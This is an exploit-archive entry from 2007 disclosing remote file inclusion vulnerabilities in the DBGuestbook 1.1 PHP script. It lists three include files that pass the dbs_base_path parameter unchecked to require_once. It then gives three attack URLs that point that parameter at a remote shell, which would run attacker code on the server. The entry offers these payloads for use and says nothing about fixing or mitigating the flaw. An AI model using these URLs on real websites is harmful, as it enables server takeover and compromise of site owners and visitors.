[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities
# Published : 2007-02-21
# Author : Denven
# Previous Title : DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities
# Next Title : Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit
DBGuestBook 1.1
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=2
*****************
ERROR:
includes/utils.php require_once $dbs_base_path
includes/guestbook.php require_once $dbs_base_path
includes/views.php require_once $dbs_base_path
**************************************************************************************
RFI:
http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]
**************************************************************************************
denven[at]gmail[dot]com
# www.Syue.com [2007-02-21]